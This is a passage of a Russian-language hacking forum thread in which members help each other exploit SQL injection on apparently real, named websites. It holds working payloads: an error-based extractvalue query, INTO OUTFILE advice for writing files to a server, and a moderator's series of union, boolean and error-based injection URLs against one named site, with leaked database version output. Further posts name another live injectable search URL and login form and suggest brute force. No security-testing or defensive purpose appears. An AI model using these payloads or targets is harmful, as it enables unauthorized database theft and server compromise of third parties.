Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,746
    Likes Received:
    398
    Reputations:
    230
    попробуй в диру сайта лить, найти папку для записи, руками а не через хавиж, возможно глюк в нём!
    Кстати, возможно ковычки ' вызывают ошибку, но хавиж может тебе и не показать, будешь руками запросы посылась сам увидешь в чём проблема!
     
    #23721 DezMond™, 27 Dec 2014
    Last edited: 27 Dec 2014
    1 person likes this.
  2. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    461
    Likes Received:
    62
    Reputations:
    26
    я пробовал уже) лил в папки которые доступны для записи... ноль эффекта.
    прочитал php.ini
    magic_quotes=off
    так что кавычки врятли тут роль играют)
     
  3. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,746
    Likes Received:
    398
    Reputations:
    230
    сам пост/гет параметр можешь вызвать php ошибку, я не про фильтр говорю
    Откуда ты узнал, что папки доступны на запись?
     
    #23723 DezMond™, 27 Dec 2014
    Last edited: 27 Dec 2014
  4. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    461
    Likes Received:
    62
    Reputations:
    26
    Ну вообще прочитал скрипт для залития изображений из админки. там четко написанно что картинки и файлы будут заливатся в ту папку( ну и сообственно в папке этой куча грязи всякой)
    Ну а вообще я редко раньше встречал что бы /tmp/ была закрыта на запись)
    Поможешь в аське если есть время конешно, не хочу тут позорится просто : ))
     
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,746
    Likes Received:
    398
    Reputations:
    230
    пиши в асю гляну, права mysql могут отличасть от php, и там где может залить пхп скрипт, мускул может не залить файл!
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    886
    Reputations:
    363
    может быть она просто выключена? по дефолту, обычно, вкл.
    присутствует в 5.7 и ниже http://dev.mysql.com/doc/refman/5.7/en/load-data.html
     
    _________________________
  7. x_Lex

    x_Lex Elder - Старейшина

    Joined:
    8 Jan 2005
    Messages:
    185
    Likes Received:
    118
    Reputations:
    171
    ребята кто знает как определить имя таблицы в sql инъекции error-based
    ситуация: mysql 5.6.x , у найденой инъекций нет доступа с базе information_schema
    Code:
    &orderby=1+and+extractvalue(rand(),concat(0x3a,(select+version())))
    но продвинутся дальше не получается не знаю префикса названия таблиц
    вопрос как вызвать ошибку с названием таблицы в ней?
     
    #23727 x_Lex, 29 Dec 2014
    Last edited: 31 Dec 2014
  8. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    1. select table_name form information_schema.tables limit 1
    2. За сколько акк купили :)
     
    1 person likes this.
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    886
    Reputations:
    363
    select table_name from information_schema.tables limit 1,1 вместо select version()
    с такими вопросами вам лучше сначала почитать статьи
     
    _________________________
  10. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108

    Ну во первых, как советуют выкинь Хавидж и сделай вручную.
    К тому же переведи в HEX колонку к виду 0x0000000 и

    SELECT 0x0000 INTO OUTFILE /path

    К тому-же, tmp это который /tmp в корне сервера или в локации вебкорня? Тот что в корне сервера, на самом деле для всех должен быть доступен на запись, а вот любые, даже кешевые и тп директории внутри вебкорня для отличных от пользователя под которым работает php(etc) могут иметь права строго ограничивающие доступ
     
  11. x_Lex

    x_Lex Elder - Старейшина

    Joined:
    8 Jan 2005
    Messages:
    185
    Likes Received:
    118
    Reputations:
    171
    а блин забыл упомянуть что нет доступа с базе information_schema
     
  12. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Какого пост-запроса?
    Стандартгая ситуация у Вас, вектор - error based:
     
    2 people like this.
  13. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,777
    Likes Received:
    848
    Reputations:
    857
    + к посту YaBtr

    Заменяем пробелы на %20

    Union Based

    http://www.favorite-picture.com/pictures/search/ffffff')and(1)=2%20order%20by%203%23.html

    http://www.favorite-picture.com/pictures/search/miss')and(1)=1%20union%20select%[email protected]@version,222%23.html

    Boolean Based

    http://www.favorite-picture.com/pictures/search/ffffff')and(1='1.html

    http://www.favorite-picture.com/pictures/search/ffffff')and(1)=1%23.html

    Error Based Classic

    http://www.favorite-picture.com/pictures/search/miss')or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))%23.html

    Duplicate entry '5.5.38-0+wheezy11'
     
    _________________________
    2 people like this.
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    886
    Reputations:
    363
    вы уверены, что доступа нет? может просто фильтруется? других способов получения имен таблиц нет. кроме грубой силы, само собой
     
    _________________________
  15. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Во первых попробовать так: `information_schema`.xxx.
    Во вторых, частенько бывает что права обрезают на information_schema.tables, стоит проверить information_schema.columns и выбирать оттуда
     
  16. x_Lex

    x_Lex Elder - Старейшина

    Joined:
    8 Jan 2005
    Messages:
    185
    Likes Received:
    118
    Reputations:
    171
    нет что то было это я точно помню мы как то в свое время определяли названия таблиц в mysql 4 там не было information_schema

    да перебрал все таблицы из базы information_schema по нулям 99.9% нет доступа к information_schema
     
  17. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    Code:
    http://hollywoodnewswire.net/pubPages/other/search_results.php?searchStr=Photo%27
    Там parameter length constraint mechanism. Как обойти для вывода?
     
  18. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    886
    Reputations:
    363
    чтобы не мучаться с этим, есть еще post sqli в форме входа
    http://hollywoodnewswire.net/scripts/login.php

    тогда вспоминайте, мне данные способы неизвестны.
     
    _________________________
    #23738 yarbabin, 2 Jan 2015
    Last edited: 2 Jan 2015
    1 person likes this.
  19. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,419
    Likes Received:
    814
    Reputations:
    848
    Брут!
     
    _________________________
  20. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    Да, я видела, и в форме "забыл пароль" тоже. Но их я не могу раскрутить. =\ Не подскажешь, какой там подход?
     
Loading...
Thread Status:
Not open for further replies.